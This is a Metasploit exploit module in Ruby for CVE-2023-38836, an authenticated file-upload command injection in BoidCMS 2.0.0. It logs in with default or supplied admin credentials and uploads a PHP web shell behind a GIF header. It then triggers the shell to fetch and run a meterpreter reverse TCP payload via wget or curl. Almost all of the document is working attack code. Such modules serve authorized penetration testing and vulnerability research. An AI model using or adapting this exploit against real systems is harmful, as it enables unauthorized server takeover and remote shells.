BoidCMS 2.0.0 Command Injection Exploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  prepend Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BoidCMS Command Injection',
        'Description' => %q{
          This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0
          and below.  BoidCMS allows the authenticated upload of a php file as media if the file has
          the GIF header, even if the file is a php file.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          '1337kid',    # Discovery
          'bwatters-r7' # Metasploit Module
        ],
        'References' => [
          [ 'CVE', '2023-38836' ],
          [ 'URL', 'https://github.com/1337kid/CVE-2023-38836']
        ],
        'Privileged' => false,
        'Arch' => ARCH_CMD,
        'Targets' => [
          [
            'nix Command',
            {
              'Platform' => ['linux', 'unix', 'python'],
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
                'FETCH_COMMAND' => 'WGET',
                'FETCH_WRITABLE_DIR' => '/tmp'
              }
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => ['windows', 'python'],
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp',
                'FETCH_WRITABLE_DIR' => '%TEMP%',
                'FETCH_COMMAND' => 'CURL'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-07-13',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'The path', '']),
      OptString.new('CMS_USERNAME', [true, 'Username', 'admin']),
      OptString.new('CMS_PASSWORD', [true, 'Password', 'password']),
      OptString.new('PHP_FILENAME', [true, 'The name for the php file to upload', "#{Rex::Text.rand_text_alphanumeric(5..11)}.php"])

    ])
    @token = nil
    @shell_filename = nil
  end

  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin'),
      'keep_cookies' => true,
      'method' => 'GET'
    )
    if res && res.code == 200
      title = res.get_html_document.xpath('//title').first.to_s
      return Exploit::CheckCode::Detected('Detected BoidCMS, but the version is unknown.') if title.include?('BoidCMS')
    end
    return Exploit::CheckCode::Safe('Unable to retrieve BoidCMS title page')
  end

  def extract_token(res)
    token = nil
    if res && res.code == 200
      token = res.get_html_document.xpath("//input[@name='token']/@value").first
    end
    token
  end

  def cms_token
    # initial login
    return @token unless @token.nil?

    vprint_status('Getting Token')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin'),
      'keep_cookies' => true,
      'method' => 'GET'
    )
    @token = extract_token(res)
  end

  def cms_login?(login_token)
    vprint_status('Logging into CMS')
    cms_password = datastore['CMS_PASSWORD']
    cms_username = datastore['CMS_USERNAME']
    vars_form_data =
      [
        {
          'name' => 'username',
          'data' => cms_username
        },
        {
          'name' => 'password',
          'data' => cms_password
        },
        {
          'name' => 'login',
          'data' => 'Login'
        },
        {
          'name' => 'token',
          'data' => login_token.to_s
        }
      ]
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin'),
      'method' => 'POST',
      'keep_cookies' => true,
      'vars_form_data' => vars_form_data
    )
    res && res.code == 302
  end

  def upload_php?(login_token, shell_filename)
    vprint_status("Uploading PHP file #{shell_filename}")
    vars_form_data =
      [
        {
          'name' => 'file',
          'data' => 'GIF89a;\n<?php system($_GET["cmd"]) ?>',
          'filename' => shell_filename
        },
        {
          'name' => 'token',
          'data' => login_token.to_s
        },
        {
          'name' => 'upload',
          'data' => 'Upload'
        }
      ]

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin'),
      'method' => 'POST',
      'keep_cookies' => true,
      'vars_get' => {
        'page' => 'media'
      },
      'vars_form_data' => vars_form_data
    )
    res && res.code == 302
  end

  def launch_payload(shell_filename, payload_cmd)
    # send the command to the php page
    vprint_status('launching Payload')
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),
      'method' => 'GET',
      'keep_cookies' => true,
      'vars_get' =>
        {
          'cmd' => payload_cmd
        }
    )
  end

  def exploit
    @shell_filename = datastore['PHP_FILENAME']
    login_token = cms_token

    fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?
    fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)
    if upload_php?(login_token, @shell_filename)
      register_file_for_cleanup @shell_filename
      launch_payload(@shell_filename, payload.encoded)
    else
      fail_with(Failure::UnexpectedReply, 'Failed to upload php files')
    end
  end

end